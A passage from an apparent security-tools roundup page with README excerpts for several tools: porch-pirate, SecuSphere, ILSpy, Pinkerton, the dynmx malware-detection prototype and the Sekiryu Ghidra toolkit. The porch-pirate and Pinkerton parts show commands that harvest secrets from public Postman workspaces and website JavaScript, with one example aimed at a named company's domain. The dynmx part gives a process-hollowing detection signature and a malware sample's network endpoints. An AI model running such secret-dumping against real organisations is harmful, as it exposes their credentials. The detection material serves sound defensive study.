    porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

    Use a proxy

    porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

    Using as a library

    Searching

from porchpirate import porchpirate

p = porchpirate()
print(p.search('coca-cola.com'))

    Get Workspace Collections

    p = porchpirate()
    print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Dumping a Workspace

from porchpirate import porchpirate
import json

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
        request_data = p.request(r['id'])
        print(request_data)

    Grabbing a Workspace's Globals

    p = porchpirate()
    print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Other Examples

    Other library usage examples can be located in the examples directory, which contains the following examples:

    • dump_workspace.py
    • format_search_results.py
    • format_workspace_collections.py
    • format_workspace_globals.py
    • get_collection.py
    • get_collections.py
    • get_profile.py
    • get_request.py
    • get_statistics.py
    • get_team.py
    • get_user.py
    • get_workspace.py
    • recursive_globals_from_search.py
    • request_to_curl.py
    • search.py
    • search_by_page.py
    • workspace_collections.py


    SecuSphere - Efficient DevSecOps

    By: Zion3R


    SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


    Centralized Vulnerability Management

    At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

    Seamless CI/CD Pipeline Integration

    SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

    Comprehensive Security Assessment

    SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

    Cultivating DevSecOps Practices

    SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

    Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

     Features

    • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
    • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
    • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
    • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

    Dashboard and Reporting

    SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

    API and Web Console

    SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

    For more information please refer to our Official Rest API Documentation

    Integration with Ticketing Systems

    SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

    Security Training and Awareness

    SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

    User Guide

    Get started with SecuSphere using our comprehensive user guide.

     Installation

    You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

    Clone the Repository

    $ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

    Setup

    Local Setup

    Navigate to the source directory and run the Python file:

    $ cd src/
    $ python run.py

    Dockerfile Setup

    Build and run the Dockerfile in the cicd directory:

    $ # From repository root
    $ docker build -t secusphere:latest .
    $ docker run secusphere:latest

    Docker Compose

    Use Docker Compose in the ci_cd/iac/ directory:

    $ cd ci_cd/iac/
    $ docker-compose -f secusphere.yml up

    Pull from Docker Hub

    Pull the latest version of SecuSphere from Docker Hub and run it:

    $ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d securityuniversal/secusphere:latest

    Feedback and Support

    We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

    Contributing

    We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



    ILSpy - .NET Decompiler With Support For PDB Generation, ReadyToRun, Metadata (and More) - Cross-Platform!

    By: Zion3R


    ILSpy is the open-source .NET assembly browser and decompiler.

    Decompiler Frontends

    Aside from the WPF UI ILSpy (downloadable via Releases, see also plugins), the following other frontends are available:

    • Visual Studio 2022 ships with decompilation support for F12 enabled by default (using our engine v7.1).
    • In Visual Studio 2019, you have to manually enable F12 support. Go to Tools / Options / Text Editor / C# / Advanced and check "Enable navigation to decompiled source"
    • C# for Visual Studio Code ships with decompilation support as well. To enable, activate the setting "Enable Decompilation Support".
    • Our Visual Studio 2022 extension marketplace
    • Our Visual Studio 2017/2019 extension marketplace
    • Our Visual Studio Code Extension repository | marketplace
    • Our Linux/Mac/Windows ILSpy UI based on Avalonia - check out https://github.com/icsharpcode/AvaloniaILSpy
    • Our ICSharpCode.Decompiler NuGet for your own projects
    • Our dotnet tool for Linux/Mac/Windows - check out ILSpyCmd in this repository
    • Our Linux/Mac/Windows PowerShell cmdlets in this repository

    Features

    • Decompilation to C# (check out the language support status)
    • Whole-project decompilation
    • Search for types/methods/properties (learn about the options)
    • Hyperlink-based type/method/property navigation
    • Base/Derived types navigation, history
    • Assembly metadata explorer (feature walkthrough)
    • BAML to XAML decompiler
    • ReadyToRun binary support for .NET Core (see the tutorial)
    • Extensible via plugins
    • Additional features in DEBUG builds (for the devs)

    License

    ILSpy is distributed under the MIT License. Please see the About doc for details, as well as third party notices for included open-source libraries.

    How to build

    Windows:

• Make sure PowerShell (at least version 5.0) is installed.
    • Clone the ILSpy repository using git.
    • Execute git submodule update --init --recursive to download the ILSpy-Tests submodule (used by some test cases).
    • Install Visual Studio (documented version: 17.1). You can install the necessary components in one of 3 ways:
      • Follow Microsoft's instructions for importing a configuration, and import the .vsconfig file located at the root of the solution.
      • Alternatively, you can open the ILSpy solution (ILSpy.sln) and Visual Studio will prompt you to install the missing components.
      • Finally, you can manually install the necessary components via the Visual Studio Installer. The workloads/components are as follows:
        • Workload ".NET Desktop Development". This workload includes the .NET Framework 4.8 SDK and the .NET Framework 4.7.2 targeting pack, as well as the .NET 6.0 SDK and .NET 7.0 SDK (ILSpy.csproj targets .NET 6.0, but we have net472+net70 projects too). Note: The optional components of this workload are not required for ILSpy
        • Workload "Visual Studio extension development" (ILSpy.sln contains a VS extension project) Note: The optional components of this workload are not required for ILSpy
        • Individual Component "MSVC v143 - VS 2022 C++ x64/x86 build tools" (or similar)
          • The VC++ toolset is optional; if present it is used for editbin.exe to modify the stack size used by ILSpy.exe from 1MB to 16MB, because the decompiler makes heavy use of recursion, where small stack sizes lead to problems in very complex methods.
      • Open ILSpy.sln in Visual Studio.
        • NuGet package restore will automatically download further dependencies
        • Run project "ILSpy" for the ILSpy UI
        • Use the Visual Studio "Test Explorer" to see/run the tests
        • If you are only interested in a specific subset of ILSpy, you can also use
          • ILSpy.Wpf.slnf: for the ILSpy WPF frontend
          • ILSpy.XPlat.slnf: for the cross-platform CLI or PowerShell cmdlets
          • ILSpy.AddIn.slnf: for the Visual Studio plugin

    Note: Visual Studio includes a version of the .NET SDK that is managed by the Visual Studio installer - once you update, it may get upgraded too. Please note that ILSpy is only compatible with the .NET 6.0 SDK and Visual Studio will refuse to load some projects in the solution (and unit tests will fail). If this problem occurs, please manually install the .NET 6.0 SDK from here.

    Unix / Mac:

    • Make sure .NET 7.0 SDK is installed.
    • Make sure PowerShell is installed (formerly known as PowerShell Core)
    • Clone the repository using git.
    • Execute git submodule update --init --recursive to download the ILSpy-Tests submodule (used by some test cases).
    • Use dotnet build ILSpy.XPlat.slnf to build the non-Windows flavors of ILSpy (.NET Core Global Tool and PowerShell Core).

    How to contribute

    Current and past contributors.

    Privacy Policy for ILSpy

    ILSpy does not collect any personally identifiable information, nor does it send user files to 3rd party services. ILSpy does not use any APM (Application Performance Management) service to collect telemetry or metrics.



    Pinkerton - An JavaScript File Crawler And Secret Finder Developed In Python

    By: Zion3R


Pinkerton is a Python tool created to crawl JavaScript files and search for secrets.


    Installing / Getting started

A quick guide on how to install and use Pinkerton.

    1. Clone the repository with: git clone https://github.com/oppsec/pinkerton.git
    2. Install the libraries with: pip3 install -r requirements.txt
    3. Run Pinkerton with: python3 main.py -u https://example.com
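Conceptually, a JavaScript secret scanner boils down to fetching script files and matching secret-shaped patterns against them. A minimal sketch (two illustrative regexes and a placeholder URL, not Pinkerton's actual pattern set):

import re

import requests

# Two illustrative secret patterns; real scanners ship many more.
PATTERNS = {
    "AWS access key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Google API key": re.compile(r"AIza[0-9A-Za-z\-_]{35}"),
}

js = requests.get("https://example.com/static/app.js", timeout=10).text
for label, pattern in PATTERNS.items():
    for match in pattern.findall(js):
        print(f"[{label}] {match}")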

    Docker

If you want to use Pinkerton in a Docker container, follow these commands:

    1. Clone the repository - git clone https://github.com/oppsec/pinkerton.git
    2. Build the image - sudo docker build -t pinkerton:latest .
    3. Run container - sudo docker run pinkerton:latest



    Pre-requisites

    • Python 3 installed on your machine.
    • Install the libraries with pip3 install -r requirements.txt

    Features

    • Works with ProxyChains
    • Fast scan
    • Low RAM and CPU usage
    • Open-Source
    • Python ❤️

    To-Do

• Add more secret regex patterns
• Improve the JavaScript file extraction function
• Improve the pattern-matching system
• Add a method to pass a list file

    Contributing

A quick guide on how to contribute to the project.

    1. Create a fork from Pinkerton repository
    2. Clone the repository with git clone https://github.com/your/pinkerton.git
    3. Type cd pinkerton/
    4. Create a branch and make your changes
    5. Commit and make a git push
    6. Open a pull request


    Credits


    Warning

    • The developer is not responsible for any malicious use of this tool.


    Dynmx - Signature-based Detection Of Malware Features Based On Windows API Call Sequences

    By: Zion3R


dynmx (spoken dynamics) is a signature-based detection approach for behavioural malware features based on Windows API call sequences. In a simplified way, you can think of dynmx as a sort of YARA for API call traces (so-called function logs) originating from malware sandboxes. Hence, the data basis for the detection approach is not the malware sample itself, analyzed statically, but the data generated during a dynamic analysis of the sample in a malware sandbox. Currently, dynmx supports function logs of the following malware sandboxes:

    • VMRay (function log, text-based and XML format)
    • CAPEv2 (report.json file)
    • Cuckoo (report.json file)

The detection approach is described in detail in the master thesis Signature-Based Detection of Behavioural Malware Features with Windows API Calls. This project is the prototype implementation of this approach and was developed in the course of the master thesis. The signatures are manually defined by malware analysts in the dynmx signature DSL and can be detected in function logs with the help of this tool. Features and syntax of the dynmx signature DSL can also be found in the master thesis. Furthermore, you can find sample dynmx signatures in the repository dynmx-signatures. In addition to detecting malware features based on API calls, dynmx can extract OS resources that are used by the malware (a so-called Access Activity Model). These resources are extracted by examining the API calls and reconstructing operations on OS resources. Currently, OS resources of the categories filesystem, registry and network are considered in the model.


    Example

    In the following section, examples are shown for the detection of malware features and for the extraction of resources.

    Detection

    For this example, we choose the malware sample with the SHA-256 hash sum c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3. According to MalwareBazaar, the sample belongs to the malware family Amadey. There is a public VMRay analysis report of this sample available which also provides the function log traced by VMRay. This function log will be our data basis which we will use for the detection.

    If we would like to know if the malware sample uses an injection technique called Process Hollowing, we can try to detect the following dynmx signature in the function log.

dynmx_signature:
  meta:
    name: process_hollow
    title: Process Hollowing
    description: Detection of Process hollowing malware feature
  detection:
    proc_hollow:
      # Create legit process in suspended mode
      - api_call: ["CreateProcess[AW]", "CreateProcessInternal[AW]"]
        with:
          - argument: "dwCreationFlags"
            operation: "flag is set"
            value: 0x4
          - return_value: "return"
            operation: "is not"
            value: 0
        store:
          - name: "hProcess"
            as: "proc_handle"
          - name: "hThread"
            as: "thread_handle"
      # Injection of malicious code into memory of previously created process
      - variant:
          - path:
              # Allocate memory with read, write, execute permission
              - api_call: ["VirtualAllocEx", "VirtualAlloc", "(Nt|Zw)AllocateVirtualMemory"]
                with:
                  - argument: ["hProcess", "ProcessHandle"]
                    operation: "is"
                    value: "$(proc_handle)"
                  - argument: ["flProtect", "Protect"]
                    operation: "is"
                    value: 0x40
              - api_call: ["WriteProcessMemory"]
                with:
                  - argument: "hProcess"
                    operation: "is"
                    value: "$(proc_handle)"
              - api_call: ["SetThreadContext", "(Nt|Zw)SetContextThread"]
                with:
                  - argument: "hThread"
                    operation: "is"
                    value: "$(thread_handle)"
          - path:
              # Map memory section with read, write, execute permission
              - api_call: "(Nt|Zw)MapViewOfSection"
                with:
                  - argument: "ProcessHandle"
                    operation: "is"
                    value: "$(proc_handle)"
                  - argument: "AccessProtection"
                    operation: "is"
                    value: 0x40
      # Resume thread to run injected malicious code
      - api_call: ["ResumeThread", "(Nt|Zw)ResumeThread"]
        with:
          - argument: ["hThread", "ThreadHandle"]
            operation: "is"
            value: "$(thread_handle)"
    condition: proc_hollow as sequence

    Based on the signature, we can find some DSL features that make dynmx powerful:

    • Definition of API call sequences with alternative paths
    • Matching of API call function names with regular expressions
    • Matching of argument and return values with several operators
    • Storage of variables, e.g. in order to track handles in the API call sequence
    • Definition of a detection condition with boolean operators (AND, OR, NOT)

If we run dynmx with the signature shown above against the function log of the sample c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3, we get the following output indicating that the signature was detected.

$ python3 dynmx.py detect -i c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt -s process_hollow.yml


[dynmx ASCII art banner]

    Ver. 0.5 (PoC), by 0x534a


    [+] Parsing 1 function log(s)
    [+] Loaded 1 dynmx signature(s)
    [+] Starting detection process with 1 worker(s). This probably takes some time...

    [+] Result
    process_hollow c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt

    We can get into more detail by setting the output format to detail. Now, we can see the exact API call sequence that was detected in the function log. Furthermore, we can see that the signature was detected in the process 51f0.exe.

$ python3 dynmx.py -f detail detect -i c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt -s process_hollow.yml


[dynmx ASCII art banner]

    Ver. 0.5 (PoC), by 0x534a


    [+] Parsing 1 function log(s)
    [+] Loaded 1 dynmx signature(s)
    [+] Starting detection process with 1 worker(s). This probably takes some time...

    [+] Result
    Function log: c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt
    Signature: process_hollow
    Process: 51f0.exe (PID: 3768)
    Number of Findings: 1
    Finding 0
    proc_hollow : API Call CreateProcessA (Function log line 20560, index 938)
    proc_hollow : API Call VirtualAllocEx (Function log line 20566, index 944)
    proc_hollow : API Call WriteProcessMemory (Function log line 20573, index 951)
    proc_hollow : API Call SetThreadContext (Function log line 20574, index 952)
    proc_hollow : API Call ResumeThread (Function log line 20575, index 953)

    Resources

    In order to extract the accessed OS resources from a function log, we can simply run the dynmx command resources against the function log. An example of the detailed output is shown below for the sample with the SHA-256 hash sum 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9. This is a CAPE sandbox report which is part of the Avast-CTU Public CAPEv2 Dataset.

    $ python3 dynmx.py -f detail resources --input 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json


[dynmx ASCII art banner]

    Ver. 0.5 (PoC), by 0x534a


    [+] Parsing 1 function log(s)
    [+] Processing function log(s) with the command 'resources'...

    [+] Result
    Function log: 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json (/Users/sijansen/Documents/dev/dynmx_flogs/cape/Public_Avast_CTU_CAPEv2_Dataset_Full/extracted/601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json)
    Process: 601941F00B194587C9E5.exe (PID: 2008)
    Filesystem:
    C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
    API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
    C:\Windows\SysWOW64\ntdll.dll (READ)
    USER32.dll (EXECUTE)
KERNEL32.dll (EXECUTE)
    C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)
    Registry:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck (READ)
    HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
    HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only (READ)
    Process: 601941F00B194587C9E5.exe (PID: 1800)
    Filesystem:
    C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
    API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
    C:\Windows\SysWOW64\ntdll.dll (READ)
    USER32.dll (EXECUTE)
    KERNEL32.dll (EXECUTE)
    [...]
    C:\Users\comp\AppData\Local\vscmouse (READ)
    C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe:Zone.Identifier (DELETE)
    Registry:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
    [...]
    Process: vscmouse.exe (PID: 900)
    Filesystem:
    C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
    API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
    C:\Windows\SysWOW64\ntdll.dll (READ)
    USER32.dll (EXECUTE)
    KERNEL32.dll (EXECUTE)
    C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)
    Registry:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck (READ)
    HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
    HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only (READ)
    Process: vscmouse.exe (PID: 3036)
    Filesystem:
    C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
    API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
    C:\Windows\SysWOW64\ntdll.dll (READ)
    USER32.dll (EXECUTE)
    KERNEL32.dll (EXECUTE)
    C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)
    C:\ (READ)
    C:\Windows\System32\uxtheme.dll (EXECUTE)
    dwmapi.dll (EXECUTE)
    advapi32.dll (EXECUTE)
    shell32.dll (EXECUTE)
    C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe (CREATE,READ)
    C:\Users\comp\AppData\Local\iproppass\iproppass.exe (DELETE)
    crypt32.dll (EXECUTE)
    urlmon.dll (EXECUTE)
    userenv.dll (EXECUTE)
    wininet.dll (EXECUTE)
    wtsapi32.dll (EXECUTE)
    CRYPTSP.dll (EXECUTE)
    CRYPTBASE.dll (EXECUTE)
    ole32.dll (EXECUTE)
    OLEAUT32.dll (EXECUTE)
    C:\Windows\SysWOW64\oleaut32.dll (EXECUTE)
    IPHLPAPI.DLL (EXECUTE)
    DHCPCSVC.DLL (EXECUTE)
    C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\ (CREATE)
    C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk (CREATE,READ)
    Registry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
    [...]
    Network:
    24.151.31.150:465 (READ)
    http://24.151.31.150:465 (READ,WRITE)
    107.10.49.252:80 (READ)
    http://107.10.49.252:80 (READ,WRITE)

    Based on the shown output and the accessed resources, we can deduce some malware features:

    • Within the process 601941F00B194587C9E5.exe (PID 1800), the Zone Identifier of the file C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe is deleted
    • Some DLLs are loaded dynamically
    • The process vscmouse.exe (PID: 3036) connects to the network endpoints http://24.151.31.150:465 and http://107.10.49.252:80

    The accessed resources are interesting for identifying host- and network-based detection indicators. In addition, resources can be used in dynmx signatures. A popular example is the detection of persistence mechanisms in the Registry.
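
Purely for illustration, a minimal sketch of what such a Registry-persistence signature could look like, reusing only the DSL constructs demonstrated above (the API call and argument names here are assumptions for the example, not a tested signature):

dynmx_signature:
  meta:
    name: registry_run_key
    title: Registry Run Key Persistence
    description: Sketch of detecting persistence via a Run key value
  detection:
    run_key:
      # Open or create the key and remember the returned handle
      - api_call: ["RegCreateKeyEx[AW]", "RegOpenKeyEx[AW]"]
        store:
          - name: "phkResult"
            as: "key_handle"
      # Write a value under the previously obtained key handle
      - api_call: ["RegSetValueEx[AW]"]
        with:
          - argument: "hKey"
            operation: "is"
            value: "$(key_handle)"
    condition: run_key as sequence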

    Installation

In order to use the software, Python 3.9 must be available on the target system. In addition, the following Python packages need to be installed:

• anytree
• lxml
• pyparsing
• PyYAML
• six
• stringcase

    To install the packages run the pip3 command shown below. It is recommended to use a Python virtual environment instead of installing the packages system-wide.

    pip3 install -r requirements.txt

    Usage

    To use the prototype, simply run the main entry point dynmx.py. The usage information can be viewed with the -h command line parameter as shown below.

    $ python3 dynmx.py -h
    usage: dynmx.py [-h] [--format {overview,detail}] [--show-log] [--log LOG] [--log-level {debug,info,error}] [--worker N] {detect,check,convert,stats,resources} ...

    Detect dynmx signatures in dynamic program execution information (function logs)

    optional arguments:
    -h, --help show this help message and exit
    --format {overview,detail}, -f {overview,detail}
    Output format
    --show-log Show all log output on stdout
    --log LOG, -l LOG log file
    --log-level {debug,info,error}
    Log level (default: info)
    --worker N, -w N Number of workers to spawn (default: number of processors - 2)

    sub-commands:
    task to perform

    {detect,check,convert,stats,resources}
    detect Detects a dynmx signature
    check Checks the syntax of dynmx signature(s)
    convert Converts function logs to the dynmx generic function log format
    stats Statistics of function logs
    resources Resource activity derived from function log

In general, as shown in the output, several command line parameters regarding the log handling, the output format for results or multiprocessing can be defined. Furthermore, a command needs to be chosen to run a specific task. Please note that the number of workers only affects commands that make use of multiprocessing. Currently, these are the commands detect and convert.

    The commands have specific command line parameters that can be explored by giving the parameter -h to the command, e.g. for the detect command as shown below.

    $ python3 dynmx.py detect -h
    usage: dynmx.py detect [-h] --sig SIG [SIG ...] --input INPUT [INPUT ...] [--recursive] [--json-result JSON_RESULT] [--runtime-result RUNTIME_RESULT] [--detect-all]

    optional arguments:
    -h, --help show this help message and exit
    --recursive, -r Search for input files recursively
    --json-result JSON_RESULT
    JSON formatted result file
    --runtime-result RUNTIME_RESULT
    Runtime statistics file formatted in CSV
    --detect-all Detect signature in all processes and do not stop after the first detection

    required arguments:
    --sig SIG [SIG ...], -s SIG [SIG ...]
    dynmx signature(s) to detect
    --input INPUT [INPUT ...], -i INPUT [INPUT ...]
    Input files

    As a user of dynmx, you can decide how the output is structured. If you choose to show the log on the console by defining the parameter --show-log, the output consists of two sections (see listing below). The log is shown first and afterwards the results of the used command. By default, the log is neither shown in the console nor written to a log file (which can be defined using the --log parameter). Due to multiprocessing, the entries in the log file are not necessarily in chronological order.



[dynmx ASCII art banner]

    Ver. 0.5 (PoC), by 0x534a


    [+] Log output
    2023-06-27 19:07:38,068+0000 [INFO] (__main__) [PID: 13315] []: Start of dynmx run
    [...]
    [+] End of log output

    [+] Result
    [...]

The level of detail of the result output can be defined using the command line parameter --format, which can be set to overview for a high-level result or to detail for a detailed result. For example, if you set the output format to detail, detection results shown in the console will contain the exact API calls and resources that caused the detection. The overview output format will just indicate what signature was detected in which function log.

    Example Command Lines

    Detection of a dynmx signature in a function log with one worker process

    python3 dynmx.py -w 1 detect -i "flog.txt" -s dynmx_signature.yml

    Conversion of a function log to the dynmx generic function log format

    python3 dynmx.py convert -i "flog.txt" -o /tmp/

    Check a signature (only basic sanity checks)

    python3 dynmx.py check -s dynmx_signature.yml

    Get a detailed list of used resources used by a malware sample based on the function log (access activity model)

    python3 dynmx.py -f detail resources -i "flog.txt"
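
Because dynmx is a plain command-line tool, it is also easy to script. A small sketch in Python (assuming the --json-result flag shown in the detect help above; the exact result schema is not documented here, so the result is only pretty-printed):

import json
import subprocess

def run_detection(flog, signature, result_file="result.json"):
    # Invoke dynmx's detect command and collect the JSON result file
    subprocess.run(
        ["python3", "dynmx.py", "detect",
         "-i", flog, "-s", signature,
         "--json-result", result_file],
        check=True,
    )
    with open(result_file) as f:
        return json.load(f)

print(json.dumps(run_detection("flog.txt", "process_hollow.yml"), indent=2))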

    Troubleshooting

Please consider that this tool is a proof-of-concept which was developed alongside the master thesis. Hence, the code quality is not always the best and there may be bugs and errors. I tried to make the tool as robust as possible in the given time frame.

    The best way to troubleshoot errors is to enable logging (on the console and/or to a log file) and set the log level to debug. Exception handlers should write detailed errors to the log which can help troubleshooting.



    Sekiryu - Comprehensive Toolkit For Ghidra Headless

    By: Zion3R


This Ghidra Toolkit is a comprehensive suite of tools designed to streamline and automate various tasks associated with running Ghidra in Headless mode. This toolkit provides a wide range of scripts that can be executed both inside and alongside Ghidra, enabling users to perform tasks such as Vulnerability Hunting, Pseudo-code Commenting with ChatGPT and Reporting with Data Visualization on the analyzed codebase. It allows users to load and save their own scripts and interact with the toolkit's built-in API.


    Key Features

    • Headless Mode Automation: The toolkit enables users to seamlessly launch and run Ghidra in Headless mode, allowing for automated and batch processing of code analysis tasks.

    • Script Repository/Management: The toolkit includes a repository of pre-built scripts that can be executed within Ghidra. These scripts cover a variety of functionalities, empowering users to perform diverse analysis and manipulation tasks. It allows users to load and save their own scripts, providing flexibility and customization options for their specific analysis requirements. Users can easily manage and organize their script collection.

    • Flexible Input Options: Users can utilize the toolkit to analyze individual files or entire folders containing multiple files. This flexibility enables efficient analysis of both small-scale and large-scale codebases.

    Available scripts

    • Vulnerability Hunting with pattern recognition: Leverage the toolkit's scripts to identify potential vulnerabilities within the codebase being analyzed. This helps security researchers and developers uncover security weaknesses and proactively address them.
• Vulnerability Hunting with Semgrep: Thanks to security researcher 0xdea and the rule-set they created, we can use simple rules and Semgrep to detect vulnerabilities in C/C++ pseudo-code (their GitHub: https://github.com/0xdea/semgrep-rules)
    • Automatic Pseudo Code Generating: Automatically generate pseudo code within Ghidra's Headless mode. This feature assists in understanding and documenting the code logic without manual intervention.
    • Pseudo-code Commenting with ChatGPT: Enhance the readability and understanding of the codebase by utilizing ChatGPT to generate human-like comments for pseudo-code snippets. This feature assists in documenting and explaining the code logic.
    • Reporting and Data Visualization: Generate comprehensive reports with visualizations to summarize and present the analysis results effectively. The toolkit provides data visualization capabilities to aid in identifying patterns, dependencies, and anomalies in the codebase.

    Pre-requisites

    Before using this project, make sure you have the following software installed:

    Installation

• Install the pre-requisites mentioned above.
    • Download Sekiryu release directly from Github or use: pip install sekiryu.

    Usage

In order to use the script, simply run it against a binary with the options you want to execute.

    • sekiryu [-F FILE][OPTIONS]

Please note that performing a binary analysis with Ghidra (or any other product) is a relatively slow process. Thus, expect the binary analysis to take several minutes depending on the host performance. If you run Sekiryu against a very large application or a large number of binary files, be prepared to WAIT.

    Demos

    API

In order to use the API, import xmlrpc in your script and call the exposed functions, for example: proxy.send_data

    Functions

• send_data() - Allows the user to send data to the server ("data" is a dictionary)
• recv_data() - Allows the user to receive data from the server ("data" is a dictionary)
• request_GPT() - Allows the user to send string data via the ChatGPT API
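
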